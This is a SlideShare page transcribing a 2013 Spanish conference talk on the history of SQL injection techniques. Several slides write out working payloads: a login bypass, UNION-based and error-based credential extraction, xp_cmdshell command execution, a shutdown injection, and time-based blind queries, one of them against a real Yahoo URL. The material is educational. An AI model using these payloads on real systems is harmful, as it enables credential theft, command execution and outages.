Your SlideShare is downloading. ×
Codemotion 2013: Feliz 15 aniversario, SQL Injection
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Introducing the official SlideShare app

Stunning, full-screen experience for iPhone and Android

Text the download link to your phone

Standard text messaging rates apply

Codemotion 2013: Feliz 15 aniversario, SQL Injection

1,208
views

Published on

Charla de Chema Alonso sobre la historia y evolución de las técnicas de SQL Injection en el evento Codemotion ES del año 2013 que tuvo lugar en la Escuela Universitaria de Informática de la …

Charla de Chema Alonso sobre la historia y evolución de las técnicas de SQL Injection en el evento Codemotion ES del año 2013 que tuvo lugar en la Escuela Universitaria de Informática de la Universidad Politécnica de Madrid

Published in: Technology

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,208
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
36
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Feliz 15 aniversario, SQL Injection
  • 2. Los Amantes del Círculo Polar
  • 3. 25 – Dec – 1998: El nacimiento http://www.phrack.org/issues.html?id=8&issue=54
  • 4. „or „1‟=„1 admin „ or „1‟=„1 q=“Select uid from users where uid=„“+$user+”‟ and pass=“‟+pass+‟”;” q=“Select uid from users where uid=„admin‟ and pass=„‟ or „1‟=„1‟;”
  • 5. 14 – Aug – 2007: IBM http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability
  • 6. Inband -1‘ union select 1,1,1,1,username,1,’a’,1 from users --
  • 7. 2001 - OutBand http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc
  • 8. Yesterday - [Microsoft][ODBC SQL Server Driver] [SQL Server]Incorrect syntax near the keyword 'or'. q=“Select title from noticias where ud=“+$id+”;” Id=1 or 1=(select top 1 username from sysusers)
  • 9. Jul – 2007: Microsoft Partner Programme
  • 10. 2002 – Advanced SQL Injection Techniques https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf
  • 11. Advanced Tricks Username: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end-- Username: ' union select ret,1,1,1 from foo-- Microsoft OLE DB Provider for ODBC Drivers error '80040e07‟ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int. exec master..xp_cmdshell 'dir' Id= 1; shutdown --
  • 12. 27 – Mar - 2007
  • 13. Outter Bands DNS Queries FTP Sites SMB Files Remote DB Web Files Log Files
  • 14. 2002 - Blind http://server/miphp.php?id=1 and 1=1 True http://server/miphp.php?id=1 and 1=0 False
  • 15. 2010 – US Army
  • 16. 2010 – US Army
  • 17. 2002 – Time Based Blind SQL Injection http://www.northernfortress.net/more_advanced_sql_injection.pdf
  • 18. (more) Advanced Tricks ping -n 10 127.0.0.1 if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'
  • 19. 2004 – Time-Based in Other Databases SQL Server 1) ; if … wait for delay 2) ; exec xp_cmdshell (ping –n) Oracle 1) dms_lock.sleep() PL/SLQ Injection MySQL 1) and sleep() 5.0 or higher 2) Benchmarck functions Postgres: 1) pg:sleep()
  • 20. Jun – 2007 : Solar Empire Exploit http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html
  • 21. Apr – 2013: Yahoo! http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p= 2&scId=113; select SLEEP(5)-- http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html
  • 22. 2007 – Time-Based SQL Injection using Heavy Queries https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
  • 23. Time-Based Using Heavy Queries in MS Access True False
  • 24. Deep Blind SQL Injection http://labs.portcullis.co.uk/application/deep-blind-sql-injection
  • 25. Serialized SQL Injection
  • 26. Airthmetic Blind SQL Injection
  • 27. RFD
  • 28. Connection String Parameter Pollution
  • 29. Xpath Injection
  • 30. LDAP Injection
  • 31. OWASP TOP 10 - 2013
  • 32. Forbiden
  • 33. Fixing Code Injections isn t the worst job